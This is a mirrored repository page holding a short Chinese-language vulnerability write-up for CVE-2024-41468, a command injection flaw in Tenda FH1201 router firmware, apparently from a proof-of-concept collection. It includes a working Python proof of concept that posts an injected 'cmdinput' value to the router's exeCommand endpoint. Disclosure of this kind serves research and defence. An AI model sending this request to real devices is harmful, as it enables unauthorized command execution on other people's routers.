admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/Tenda/Tenda-FH1201存在命令注入漏洞(CVE-2024-41468).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

825 B
Raw Blame History

Tenda-FH1201存在命令注入漏洞(CVE-2024-41468)

Tenda FH1201 v1.2.0.14存在命令注入漏洞位于exeCommand函数中cmdinput参数未经任何过滤就被复制到栈空间v7中然后执行因此攻击者可以利用该漏洞执行任意命令

固件下载网站:https://www.tendacn.com/download/detail-3322.html

image-20240730214911627

poc

import requests

ip = '192.168.74.145'

url = f"http://{ip}/goform/exeCommand"


data = "cmdinput=ls;"
ret = requests.post(url=url,data=data)

image-20240730214940461

漏洞来源